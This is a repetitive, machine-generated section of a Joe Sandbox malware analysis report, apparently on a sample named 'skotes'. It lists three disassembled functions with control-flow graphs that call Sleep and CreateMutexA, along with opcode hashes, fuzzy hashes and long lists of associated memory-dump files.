                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797840537.000000000029E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797874098.00000000002B7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797889592.00000000002C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797910125.00000000002C7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797934577.00000000002CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797967415.00000000002E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797983592.00000000002E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798008754.00000000002EE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798029578.00000000002EF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798050369.00000000002F0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798075626.00000000002F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798097991.00000000002F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798120589.00000000002FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798144608.0000000000305000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798165916.0000000000308000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798188059.0000000000309000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798211528.0000000000310000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798236053.0000000000318000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798258007.0000000000319000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798280895.000000000031A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798302467.0000000000322000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798331068.0000000000332000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798354983.0000000000333000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798376661.0000000000334000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798401189.0000000000336000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798401189.000000000035E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798458925.0000000000375000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798480237.0000000000376000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798504086.000000000038B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798527963.000000000038C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798548569.0000000000391000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798573458.0000000000393000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798598071.00000000003A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798621459.00000000003A3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_90000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1464230837-0
                                                                                                                                                                                                                                                  • Opcode ID: c5ba5910963697312c7c9db2a1c275982751525979159ebe618f82e4bdce6bc5
                                                                                                                                                                                                                                                  • Instruction ID: 7bc55109e07913d8df2042ebff6572163f35e60d478ae720d5e42013ef12e470
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c5ba5910963697312c7c9db2a1c275982751525979159ebe618f82e4bdce6bc5
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5A310931B002009BEF18AB78DC89BADB7A1AB87314F244618E414DB6D2C77599819752
                                                                                                                                                                                                                                                  Function 0009A682 Relevance: 3.1, APIs: 2, Instructions: 131sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 202 9a682-9a6a2 206 9a6d0-9a6ec 202->206 207 9a6a4-9a6b0 202->207 208 9a71a-9a739 206->208 209 9a6ee-9a6fa 206->209 210 9a6b2-9a6c0 207->210 211 9a6c6-9a6cd call ad663 207->211 214 9a73b-9a747 208->214 215 9a767-9a916 call a80c0 208->215 212 9a6fc-9a70a 209->212 213 9a710-9a717 call ad663 209->213 210->211 216 9a949-9a994 call c6c6a * 2 Sleep CreateMutexA 210->216 211->206 212->213 212->216 213->208 221 9a749-9a757 214->221 222 9a75d-9a764 call ad663 214->222 234 9a9a7-9a9a8 216->234 235 9a996-9a998 216->235 221->216 221->222 222->215 235->234 236 9a99a-9a9a5 235->236 236->234
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00000064), ref: 0009A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNELBASE(00000000,00000000,000F3254), ref: 0009A981
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1797249144.0000000000091000.00000040.00000001.01000000.00000007.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797227905.0000000000090000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797249144.00000000000F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797326311.00000000000F9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797350265.00000000000FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797372218.0000000000107000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797500994.0000000000268000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797522618.000000000026B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797545804.0000000000279000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797565834.000000000027B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797589743.000000000027D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797589743.0000000000285000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797632656.000000000028B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797654068.000000000028C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797689073.000000000028E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797709124.000000000028F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797800677.000000000029A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797840537.000000000029E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797874098.00000000002B7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797889592.00000000002C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797910125.00000000002C7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797934577.00000000002CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797967415.00000000002E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797983592.00000000002E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798008754.00000000002EE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798029578.00000000002EF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798050369.00000000002F0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798075626.00000000002F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798097991.00000000002F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798120589.00000000002FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798144608.0000000000305000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798165916.0000000000308000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798188059.0000000000309000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798211528.0000000000310000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798236053.0000000000318000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798258007.0000000000319000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798280895.000000000031A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798302467.0000000000322000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798331068.0000000000332000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798354983.0000000000333000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798376661.0000000000334000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798401189.0000000000336000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798401189.000000000035E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798458925.0000000000375000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798480237.0000000000376000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798504086.000000000038B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798527963.000000000038C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798548569.0000000000391000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798573458.0000000000393000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798598071.00000000003A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798621459.00000000003A3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_90000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1464230837-0
                                                                                                                                                                                                                                                  • Opcode ID: aa0ef3f8189341b88ef3d7066a78cac56a67dad0793fd51c2a49579d172c527c
                                                                                                                                                                                                                                                  • Instruction ID: 5c218bcfdee084a002b3528d221b03af8bdec967f3d8073c5c619f2a14dd9ead
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aa0ef3f8189341b88ef3d7066a78cac56a67dad0793fd51c2a49579d172c527c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CD311831B042409BEF189BBCDC89BADB7B2EB87324F248618E014D77D1C77599819793
                                                                                                                                                                                                                                                  Function 00099ADC Relevance: 3.1, APIs: 2, Instructions: 107sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 238 99adc-99ae8 239 99aea-99af8 238->239 240 99afe-99d91 call ad663 call a7a00 call 95c10 call 98b30 call a8220 call a7a00 call 95c10 call 98b30 call a8220 238->240 239->240 241 9a917 239->241 244 9a953-9a994 Sleep CreateMutexA 241->244 245 9a917 call c6c6a 241->245 250 9a9a7-9a9a8 244->250 251 9a996-9a998 244->251 245->244 251->250 253 9a99a-9a9a5 251->253 253->250
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00000064), ref: 0009A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNELBASE(00000000,00000000,000F3254), ref: 0009A981
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1797249144.0000000000091000.00000040.00000001.01000000.00000007.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797227905.0000000000090000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797249144.00000000000F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797326311.00000000000F9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797350265.00000000000FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797372218.0000000000107000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797500994.0000000000268000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797522618.000000000026B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797545804.0000000000279000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797565834.000000000027B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797589743.000000000027D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797589743.0000000000285000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797632656.000000000028B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797654068.000000000028C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797689073.000000000028E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797709124.000000000028F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797800677.000000000029A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797840537.000000000029E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797874098.00000000002B7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797889592.00000000002C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797910125.00000000002C7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797934577.00000000002CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797967415.00000000002E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797983592.00000000002E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798008754.00000000002EE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798029578.00000000002EF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798050369.00000000002F0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798075626.00000000002F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798097991.00000000002F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798120589.00000000002FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798144608.0000000000305000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798165916.0000000000308000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798188059.0000000000309000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798211528.0000000000310000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798236053.0000000000318000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798258007.0000000000319000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798280895.000000000031A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798302467.0000000000322000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798331068.0000000000332000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798354983.0000000000333000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798376661.0000000000334000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798401189.0000000000336000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798401189.000000000035E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798458925.0000000000375000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798480237.0000000000376000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798504086.000000000038B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798527963.000000000038C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798548569.0000000000391000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798573458.0000000000393000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798598071.00000000003A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798621459.00000000003A3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_90000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1464230837-0
                                                                                                                                                                                                                                                  • Opcode ID: 961bc486d723cb3b686ccc16c7ccd5a2bae4aaee7ffa1279bd49787ac5508494
                                                                                                                                                                                                                                                  • Instruction ID: a7d2c188b77c6701d3b0e00580f7c09a50cb051ce20bbf73249a4e5d5c906d2d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 961bc486d723cb3b686ccc16c7ccd5a2bae4aaee7ffa1279bd49787ac5508494
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B1213731B042009BFF18AB6CDC89B6DB7A1EBC3310F24461DE418D76D1CB7999809652
                                                                                                                                                                                                                                                  Function 0009A856 Relevance: 3.1, APIs: 2, Instructions: 100sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 306 9a856-9a86e 307 9a89c-9a89e 306->307 308 9a870-9a87c 306->308 309 9a8a9-9a8b1 call 97d30 307->309 310 9a8a0-9a8a7 307->310 311 9a87e-9a88c 308->311 312 9a892-9a899 call ad663 308->312 322 9a8b3-9a8bb call 97d30 309->322 323 9a8e4-9a8e6 309->323 313 9a8eb-9a916 call a80c0 310->313 311->312 315 9a94e-9a987 call c6c6a Sleep CreateMutexA 311->315 312->307 327 9a98e-9a994 315->327 322->323 328 9a8bd-9a8c5 call 97d30 322->328 323->313 329 9a9a7-9a9a8 327->329 330 9a996-9a998 327->330 328->323 335 9a8c7-9a8cf call 97d30 328->335 330->329 332 9a99a-9a9a5 330->332 332->329 335->323 338 9a8d1-9a8d9 call 97d30 335->338 338->323 341 9a8db-9a8e2 338->341 341->313
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00000064), ref: 0009A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNELBASE(00000000,00000000,000F3254), ref: 0009A981
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1797249144.0000000000091000.00000040.00000001.01000000.00000007.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797227905.0000000000090000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797249144.00000000000F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797326311.00000000000F9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797350265.00000000000FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797372218.0000000000107000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797500994.0000000000268000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797522618.000000000026B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797545804.0000000000279000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797565834.000000000027B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797589743.000000000027D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797589743.0000000000285000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797632656.000000000028B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797654068.000000000028C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797689073.000000000028E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797709124.000000000028F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797800677.000000000029A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797840537.000000000029E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797874098.00000000002B7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797889592.00000000002C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797910125.00000000002C7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797934577.00000000002CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797967415.00000000002E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1797983592.00000000002E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798008754.00000000002EE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798029578.00000000002EF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798050369.00000000002F0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798075626.00000000002F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798097991.00000000002F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798120589.00000000002FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798144608.0000000000305000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798165916.0000000000308000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798188059.0000000000309000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798211528.0000000000310000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1798236053.0000000000318000.00000080.00000001.01000000.00000007.sdmpDownload File
